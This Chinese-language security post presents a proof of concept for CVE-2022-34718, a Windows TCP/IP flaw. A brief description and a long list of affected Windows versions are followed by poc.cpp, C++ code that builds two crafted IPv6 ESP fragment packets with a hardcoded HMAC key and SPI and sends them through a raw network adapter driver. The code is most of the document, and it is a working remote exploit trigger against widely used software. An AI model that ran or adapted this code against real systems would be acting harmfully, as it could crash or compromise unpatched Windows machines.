【CVE-2022-34718】Microsoft Windows TCP/IP component 安全漏洞POC
作者:Sec-Labs | 发布时间:
漏洞简介
Microsoft Windows TCP/IP component是美国微软(Microsoft)公司的一个为Windows提供TCP/IP配置功能的组件。
Microsoft Windows TCP/IP存在安全漏洞。以下产品和版本受到影响:Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows 11 for x64-based Systems,Windows 11 for ARM64-based Systems,Windows 10 Version 21H2 for 32-bit Systems,Windows 10 Version 21H2 for ARM64-based Systems,Windows 10 Version 21H2 for x64-based Systems,Windows 10 for 32-bit Systems,Windows 10 for x64-based Systems,Windows 10 Version 1607 for 32-bit Systems,Windows 10 Version 1607 for x64-based Systems,Windows Server 2016,Windows Server 2016 (Server Core installation),Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation),Windows Server 2008 for x64-based Systems Service Pack 2,Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation),Windows Server 2008 R2 for x64-based Systems Service Pack 1,Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation),Windows Server 2012,Windows Server 2012 (Server Core installation),Windows Server 2012 R2,Windows Server 2012 R2 (Server Core installation),Windows 10 Version 21H1 for 32-bit Systems,Windows Server 2022,Windows Server 2022 (Server Core installation),Windows Server 2022 Azure Edition Core Hotpatch,Windows 7 for 32-bit Systems Service Pack 1,Windows 7 for x64-based Systems Service Pack 1,Windows 8.1 for 32-bit systems,Windows 8.1 for x64-based systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 21H1 for x64-based Systems,Windows 10 Version 21H1 for ARM64-based Systems,Windows RT 8.1,Windows Server 2008 for 32-bit Systems Service Pack 2。
POC
poc.cpp
////////////////////////////////////////////////
// ScannerDemo.cpp文件
#include "../common/initsock.h"
#include <windows.h>
#include <stdio.h>
#include "ntddndis.h"
#include "protoutils.h"
#include "ProtoPacket.h"
#include <Stdint.h>
#include "Iphlpapi.h"
#pragma comment(lib, "Iphlpapi.lib")
#pragma comment(lib, "Bcrypt.lib")
#include "../common/comm.h"
DWORD WINAPI SendThread(LPVOID lpParam);
BOOL GetGlobalData();
u_char g_ucLocalMac[6];
DWORD g_dwGatewayIP;
DWORD g_dwLocalIP;
DWORD g_dwMask;
CInitSock theSock;
BCRYPT_ALG_HANDLE m_hAesAlg;
BCRYPT_KEY_HANDLE m_hKey;
PBYTE m_pbKeyObject;
PBYTE m_pbIV;
//Handle for Hash
BCRYPT_HASH_HANDLE m_hHash;
PBYTE m_pbHashObject;
BCRYPT_ALG_HANDLE m_hHashAlg;
BYTE rgbHash[0x14];
UCHAR str_SHA1_key[] =
"\xbc\x3d\x6e\x74\x2d\xd2\x13\xbe\x0b\xa9\x42\xb7\x33\xa4\x7a\xf4\x9b\xa2\xa8\x90";
UINT32 spi = htonl(0x861b157c);
void SHA1(PUCHAR str_data, DWORD len)
{
BCRYPT_KEY_HANDLE hKey = NULL;
DWORD cbHashObject, cbResult, temp = 0;
DWORD cbData = 0;
BCryptOpenAlgorithmProvider(&m_hHashAlg, BCRYPT_SHA1_ALGORITHM, NULL, 8);
// Determine the size of the Hash object
BCryptGetProperty(m_hHashAlg, BCRYPT_OBJECT_LENGTH, (PBYTE)&cbHashObject, sizeof(DWORD), &cbResult, 0);
m_pbHashObject = (PBYTE)malloc(cbHashObject);
// Create the Hash object
BCryptCreateHash(m_hHashAlg, &m_hHash, m_pbHashObject, cbHashObject, str_SHA1_key, 0x14, 0);
// Hash the data
BCryptHashData(m_hHash, (PBYTE)str_data, len, 0);
// Finish the hash
BCryptFinishHash(m_hHash, rgbHash, 0x14, 0);
return ;
}
BOOL GetGlobalData()
{
PIP_ADAPTER_INFO pAdapterInfo = NULL;
ULONG ulLen = 0;
::GetAdaptersInfo(pAdapterInfo, &ulLen);
pAdapterInfo = (PIP_ADAPTER_INFO)::GlobalAlloc(GPTR, ulLen);
if (::GetAdaptersInfo(pAdapterInfo, &ulLen) == ERROR_SUCCESS)
{
if (pAdapterInfo != NULL)
{
memcpy(g_ucLocalMac, pAdapterInfo->Address, 6);
g_dwGatewayIP = ::inet_addr(pAdapterInfo->GatewayList.IpAddress.String);
g_dwLocalIP = ::inet_addr(pAdapterInfo->IpAddressList.IpAddress.String);
g_dwMask = ::inet_addr(pAdapterInfo->IpAddressList.IpMask.String);
}
}
::GlobalFree(pAdapterInfo);
return TRUE;
}
int main()
{
GetGlobalData();
if (!ProtoStartService())
{
printf(" ProtoStartService() failed %d \n", ::GetLastError());
return -1;
}
HANDLE hControlDevice = ProtoOpenControlDevice();
if (hControlDevice == INVALID_HANDLE_VALUE)
{
printf(" ProtoOpenControlDevice() failed() %d \n", ::GetLastError());
ProtoStopService();
return -1;
}
CPROTOAdapters adapters;
if (!adapters.EnumAdapters(hControlDevice))
{
printf(" Enume adapter failed \n");
ProtoStopService();
return -1;
}
CAdapter adapter;
if (!adapter.OpenAdapter(adapters.m_pwszSymbolicLink[0], FALSE))
{
printf(" OpenAdapter failed \n");
ProtoStopService();
return -1;
}
adapter.SetFilter( // NDIS_PACKET_TYPE_PROMISCUOUS|
NDIS_PACKET_TYPE_DIRECTED |
NDIS_PACKET_TYPE_MULTICAST | NDIS_PACKET_TYPE_BROADCAST);
UCHAR ipv6_ESP_Fragment_1[] =
"\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00"
"\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85"
"\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5"
"\x70\x83\x16\x6f\xef\x6b"
"\x41\x41\x41\x41\x00\x00\x00\x21"//SPI+Seq
"\x2c\x00\x00\x01\x52\x52\x52\x52\x32\x00\x00\x01\x96\x74\xd9\x9d"
"\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00"
"\x01\x02\x02\x2c"//ESP tail
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC;
UCHAR ipv6_ESP_Fragment_2[] =
"\x00\x0c\x29\x1c\x11\x93\x00\x0c\x29\x5c\x9a\x88\x86\xdd\x60\x00"
"\x00\x00\x00\x38\x32\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x81\x85"
"\xb1\x51\x19\x43\x54\x19\xfe\x80\x00\x00\x00\x00\x00\x00\xf8\xe5"
"\x70\x83\x16\x6f\xef\x6b"
"\x41\x41\x41\x41\x00\x00\x00\x22"//SPI+Seq
"\x2c\x00\x00\x18\x52\x52\x52\x52\x32\x00\x00\x00\x96\x74\xd9\x9d"
"\x2b\x00\x00\x00\x00\x00\x00\x00\x2b\x00\x00\x00\x00\x00\x00\x00"
"\x01\x02\x02\x2c"//ESP tail
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";//HMAC;
memcpy(ipv6_ESP_Fragment_1 + 0x36, &spi, 4);
SHA1(&ipv6_ESP_Fragment_1[0x36], 0x2c);
memcpy(ipv6_ESP_Fragment_1 + 0x62, rgbHash, 0x0c);
memcpy(ipv6_ESP_Fragment_2 + 0x36, &spi, 4);
SHA1(&ipv6_ESP_Fragment_2[0x36], 0x2c);
memcpy(ipv6_ESP_Fragment_2 + 0x62, rgbHash, 0x0c);
adapter.SendData(ipv6_ESP_Fragment_1, sizeof(ipv6_ESP_Fragment_1)-1);
adapter.SendData(ipv6_ESP_Fragment_2, sizeof(ipv6_ESP_Fragment_2)-1);
ProtoStopService();
return 0;
}